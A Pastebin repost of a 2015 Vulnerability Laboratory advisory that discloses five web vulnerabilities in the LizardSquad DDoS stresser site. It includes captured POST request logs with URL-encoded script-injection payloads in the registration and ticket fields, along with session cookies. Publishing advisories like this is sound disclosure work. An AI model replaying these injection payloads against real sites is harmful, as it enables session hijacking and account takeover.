Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Document Title:
- ===============
- LizardSquad DDoS Stresser - Multiple Vulnerabilities
- References (Source):
- ====================
- http://www.vulnerability-lab.com/get_content.php?id=1417
- http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#
- Release Date:
- =============
- 2015-01-20
- Vulnerability Laboratory ID (VL-ID):
- ====================================
- 1417
- Common Vulnerability Scoring System:
- ====================================
- 8.9
- Product & Service Introduction:
- ===============================
- The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks,
- like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with
- massive amounts of bogus requests.
- (Copy of the Homepage: https://lizardstresser.su/ )
- Abstract Advisory Information:
- ==============================
- The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.
- Vulnerability Disclosure Timeline:
- ==================================
- 2015-01-20: Public Disclosure (Vulnerability Laboratory)
- Discovery Status:
- =================
- Published
- Affected Product(s):
- ====================
- LizardSquad
- Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1
- Exploitation Technique:
- =======================
- Remote
- Severity Level:
- ===============
- High
- Technical Details & Description:
- ================================
- Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.
- 1.1
- The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload
- to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows
- to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the
- vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user
- passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts.
- This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code
- that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the
- register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username
- is getting visible.
- Vulnerable Module(s):
- [+] Registration (./ref)
- Vulnerable Parameter(s):
- [+] username
- Affected Module(s):
- [+] Dashboard (Username in Left Sidebar)
- 1.2
- The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered
- user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account.
- After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise
- the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed
- open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session
- of the add Ticket POST method request.
- Vulnerable Module(s):
- [+] Tickets (./tickets)
- Vulnerable Parameter(s):
- [+] name (servername)
- 1.3
- The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the
- ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the
- panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the
- data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that
- affects the ddos control panel.
- Vulnerable Module(s):
- [+] server list
- Vulnerable Parameter(s):
- [+] name (servername)
- 1.4
- The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own
- account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can
- also be observed by man-in-the-middle attacks in the local network.
- Vulnerable Module(s):
- [+] dasboard > user settings > change password
- 1.5
- The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the
- ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by
- changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).
- Vulnerable Module(s):
- [+] dasboard > user settings > change password
- Vulnerable Parameter(s):
- [+] id
- Proof of Concept (PoC):
- =======================
- 1.1
- --- PoC Session Logs [POST] (Injection) ---
- Status: 200[OK]
- POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0
- (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer
- [http://lizardstresser.su/usercp]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- POST-Daten:
- cpassword[chaos666]
- npassword[http%3A%2F
- %2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
- rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
- updatePassBtn[Change+Stored+Data%21]
- Response Header:
- Date[Tue, 20 Jan 2015
- 10:29:21 GMT]
- Content-Type[text/html]
- Transfer-Encoding[chunked]
- Connection[keep-alive]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Server[cloudflare-nginx]
- CF-RAY[1aba972a06dd15b3-FRA]
- Content-Encoding[gzip]
- -
- Status: 302[Moved Temporarily]
- POST https://lizardstresser.su/register.php
- Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[https://lizardstresser.su/register.php]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- POST-Daten:
- username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
- password[chaos666]
- rpassword[chaos666]
- email[research%40vulnerbaility-lab.com]
- ref[%2F]
- checkbox1[1]
- register[Register]
- Response Header:
- Server[cloudflare-nginx]
- Date[Tue, 20 Jan 2015 11:20:02 GMT]
- Content-Type[text/html]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Location[/purchase]
- CF-RAY[1abae168238f15b3-FRA]
- X-Firefox-Spdy[3.1]
- Reference(s):
- http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
- https://lizardstresser.su/register.php
- 1.2
- --- PoC Session Logs [POST] (Injection) ---
- Status: 200[OK]
- POST http://lizardstresser.su/ajax/addticket.php
- Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[*/*]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
- X-Requested-With[XMLHttpRequest]
- Referer[http://lizardstresser.su/tickets]
- Content-Length[324]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- Pragma[no-cache]
- Cache-Control[no-cache]
- POST-Daten:
- title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
- Response Header:
- Date[Tue, 20 Jan 2015 10:30:54 GMT]
- Content-Type[text/html]
- Transfer-Encoding[chunked]
- Connection[keep-alive]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Server[cloudflare-nginx]
- CF-RAY[1aba996d3d7115b3-FRA]
- Content-Encoding[gzip]
- Reference(s):
- http://lizardstresser.su/ajax/addticket.php
- Credits & Authors:
- ==================
- Vulnerability Laboratory [Research Team]
- Disclaimer & Information:
- =========================
- The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
- or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
- in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
- or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
- consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
- policies, deface websites, hack into databases or trade with fraud/stolen material.
- Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
- Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
- Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
- Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
- Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
- Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
- Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
- electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
- Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
- is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
- (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
- Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
- --
- VULNERABILITY LABORATORY - RESEARCH TEAM
- SERVICE: www.vulnerability-lab.com
- CONTACT: research@vulnerability-lab.com
- PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Add Comment
Please, Sign In to add comment